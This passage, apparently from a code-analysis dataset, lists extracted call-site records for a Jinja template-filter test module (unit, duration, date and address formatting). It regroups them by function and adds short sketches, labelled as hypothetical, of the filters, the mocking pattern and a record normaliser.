format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((460, 25, 460, 62), 'app.jinja_filters.format_unit', 'format_unit', ({(460, 37, 460, 56): '"""area-square-meter"""', (460, 58, 460, 61): '(100)'}, {}), "('area-square-meter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((461, 25, 461, 67), 'app.jinja_filters.format_unit', 'format_unit', ({(461, 37, 461, 61): '"""area-square-centimeter"""', (461, 63, 461, 66): '(100)'}, {}), "('area-square-centimeter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, 
apis field, continued: extracted call-site records for a jinja_filters test module. Each raw record is a tuple of (source span, qualified name, local name, (positional args, keyword args), call representation, attribute flag, import statement). The same import statement is attached verbatim to every record, so the calls are listed here grouped by callable, with the shared import statements given once at the end of the field.

app.jinja_filters.format_unit
    format_unit('area-square-kilometer', 100)    # line 462
    format_unit('area-square-mile', 100)         # line 463
    format_unit('area-hectare', 100)             # line 464
    format_unit('area-acre', 100)                # line 465
    format_unit('volume-cubic-meter', 100)       # line 466
    format_unit('volume-cubic-centimeter', 100)  # line 467
    format_unit('volume-liter', 100)             # line 468
    format_unit('volume-hectoliter', 100)        # line 469
    format_unit('volume-megaliter', 100)         # line 470
    format_unit('duration-hour', 100)            # lines 471, 477
    format_unit('duration-year', 100)            # line 478
    format_unit('duration-hour', 100, 'long')    # lines 472, 479
    format_unit('duration-year', 100, 'long')    # lines 473, 480
app.jinja_filters.format_unit_input_label
    format_unit_input_label('length-meter')             # line 484
    format_unit_input_label('length-centimeter')        # line 485
    format_unit_input_label('length-mile')              # line 486
    format_unit_input_label('length-kilometer')         # line 487
    format_unit_input_label('area-square-meter')        # line 488
    format_unit_input_label('area-square-centimeter')   # line 489
    format_unit_input_label('area-square-kilometer')    # line 490
    format_unit_input_label('area-square-mile')         # line 491
    format_unit_input_label('area-hectare')             # line 492
    format_unit_input_label('area-acre')                # line 493
    format_unit_input_label('volume-cubic-meter')       # line 494
    format_unit_input_label('volume-cubic-centimeter')  # line 495
    format_unit_input_label('volume-liter')             # line 496
    format_unit_input_label('volume-hectoliter')        # line 497
    format_unit_input_label('volume-megaliter')         # line 498
    format_unit_input_label('duration-hour')            # lines 499, 506
    format_unit_input_label('duration-hour', 'long')    # lines 500, 507
    format_unit_input_label('duration-year')            # lines 501, 508
    format_unit_input_label('duration-year', 'long')    # lines 502, 509
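An input label needs the unit name without a quantity attached, and Babel exposes exactly that lookup. A sketch of this filter, again an assumption about the real implementation rather than its actual source:

# Hypothetical sketch of a format_unit_input_label-style filter.
# Assumption: Babel's get_unit_name returns the bare CLDR unit name,
# e.g. 'hours' for 'duration-hour' at length='long'.
from babel.units import get_unit_name

def format_unit_input_label(measurement_unit, unit_length='short', locale='en_GB'):
    return get_unit_name(measurement_unit, length=unit_length, locale=locale)

print(format_unit_input_label('duration-hour'))          # e.g. 'hr'
print(format_unit_input_label('duration-hour', 'long'))  # e.g. 'hours'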
jinja2.Undefined
    Undefined()  # lines 43, 62, 76, 577, 655; five instances on line 917
app.jinja_filters.max_value
    max_value(*args)  # lines 581, 594
app.jinja_filters.min_value
    min_value(*args)  # lines 659, 672
datetime.timedelta
    timedelta(...)  # keyword arguments not captured in the records; lines 624, 702
app.jinja_filters.calculate_offset_from_weekday_in_last_whole_week
    calculate_offset_from_weekday_in_last_whole_week(*case[0:3])              # line 837
    calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')  # line 841
    calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')          # line 849
unittest.mock.patch and datetime.datetime (used together in the offset tests)
    patch('app.jinja_filters.datetime')  # line 844
    datetime(2018, 8, 10)                # line 846
    datetime.strftime(*args, **kw)       # line 847
app.jinja_filters.format_repeating_summary
    format_repeating_summary(None, case[0])  # line 903
    format_repeating_summary(None, [])       # line 909
app.jinja_filters.format_address_list
    format_address_list(user_entered_address, metadata_address)  # lines 920, 926, 932, 938, 944, 950
    format_address_list(answer_address, metadata_address)        # line 957
app.jinja_filters.format_conditional_date
    format_conditional_date(self.autoescape_context, date1, date2)  # lines 222, 249
app.jinja_filters.calculate_years_difference
    calculate_years_difference(start_date, end_date)  # line 270
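The patch/datetime records at lines 844-847 are consistent with the standard pattern for freezing "today" while keeping strftime usable on a mocked datetime module. A sketch of that pattern follows; the exact attribute mocked (utcnow vs. now) is an assumption, and running it requires the app.jinja_filters package on the import path.

# Hypothetical reconstruction of the mocking pattern implied by the records.
from datetime import datetime
from unittest.mock import patch

with patch('app.jinja_filters.datetime') as mock_datetime:
    # Freeze the current date seen by the code under test (assumed attribute).
    mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
    # Delegate strftime back to the real class so formatting still works,
    # matching the datetime.strftime(*args, **kw) call recorded at line 847.
    mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
    # ... exercise calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU') here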
app.jinja_filters.format_duration
    format_duration({'years': 5, 'months': 4})  # line 514
    format_duration({'years': 5, 'months': 0})  # line 515
    format_duration({'years': 0, 'months': 4})  # line 516
    format_duration({'years': 1, 'months': 1})  # line 517
    format_duration({'years': 0, 'months': 0})  # line 518
    format_duration({'years': 5})   # line 522
    format_duration({'years': 1})   # line 523
    format_duration({'years': 0})   # line 524
    format_duration({'months': 5})  # line 528
    format_duration({'months': 1})  # line 529
    format_duration({'months': 0})  # line 530
app.jinja_filters.format_date_custom
    format_date_custom(self.autoescape_context, *case[0:2])  # line 864
app.jinja_filters.format_date_range_no_repeated_month_year
    format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3])  # line 884
datetime.datetime
    datetime.utcnow()  # line 131
    datetime.today()   # line 257
dateutil.relativedelta.relativedelta
    relativedelta(...)  # keyword arguments not captured in the record; line 257
jinja2.Markup
    Markup(x)  # line 905

Import statements recorded with the calls (each attached verbatim to every record in the raw field):
    from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list
    from jinja2 import Undefined, Markup
    from datetime import datetime, timedelta
    from unittest.mock import patch
    from dateutil.relativedelta import relativedelta
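Because every raw record carries the same multi-hundred-character import string, the field is dominated by duplication. A small normaliser can recover the grouped form shown above; the seven-field tuple layout below is inferred from the dump itself, not from a published schema.

# Hypothetical normaliser for the api-call records in this field.
# Inferred record layout: (span, qualified_name, local_name,
# (positional_args, keyword_args), call_repr, is_attribute_call, import_stmt).
from collections import defaultdict

def group_api_records(records):
    grouped = defaultdict(list)
    imports = set()
    for span, qualified_name, _local, _args, call_repr, _is_attr, import_stmt in records:
        start_line = span[0]      # spans are (start_line, start_col, end_line, end_col)
        grouped[qualified_name].append((start_line, call_repr))
        imports.add(import_stmt)  # deduplicate the repeated import string
    return dict(grouped), sorted(imports)

sample = [((462, 25, 462, 66), 'app.jinja_filters.format_unit', 'format_unit',
           ({}, {}), "format_unit('area-square-kilometer', 100)", False,
           'from app.jinja_filters import format_unit')]
calls, imports = group_api_records(sample)
print(calls['app.jinja_filters.format_unit'])  # [(462, "format_unit('area-square-kilometer', 100)")]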